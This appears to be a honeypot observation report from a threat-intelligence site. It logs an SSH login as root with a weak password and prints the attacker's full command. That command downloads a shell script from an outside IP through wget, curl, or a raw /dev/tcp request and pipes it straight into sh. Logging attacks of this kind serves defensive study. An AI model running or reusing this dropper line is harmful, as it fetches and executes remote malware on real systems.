Report of Attack 94.103.125.37 (37.125.103.94.in-addr.arpa) ssh observation

Header

Time	2024/10/22, 10:11:22 (GMT)
Transaction ID	2JWZGSU19IKB3BIW
Service	ssh
Location	BG (Bulgaria)
Attacker	94.103.125.37
Classification	Web script execution
Harm Potential	High

Description

Script execution method downloaded from the www (web)

Content

94.103.125.37 client username 'root' and password 'admin@12345' entered
94.103.125.37 client command : 'uname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"; SC=$(wget -O- http://94.156.177.109/sh || curl http://94.156.177.109/sh); if [ $? -ne 0 ]; then exec 3<>"/dev/tcp/94.156.177.109/80"; echo -e "GET /sh HTTP/1.0\r\nHost: 94.156.177.109\r\n\r\n" >&3; (while read -r line; do [ "$line" = $'\r' ] && break; done && cat) <&3 | sh -s ssh; exec 3>&-; else echo "$SC" | sh -s ssh; fi'

All observations are coming from honeypot central database.

Please share your wishes, opinions and suggestions with us: Honeypots.tk Admin

If you like, you can support
with your donations to us..

Donate

Attack Report for Observation

Header

Time

2024/10/22, 10:11:22 (GMT)

Transaction ID

2JWZGSU19IKB3BIW

Service

ssh

Location

BG (Bulgaria)

Attacker

94.103.125.37

Classification

Web script execution

Harm Potential

High

Description

Script execution method downloaded from the www (web)

Content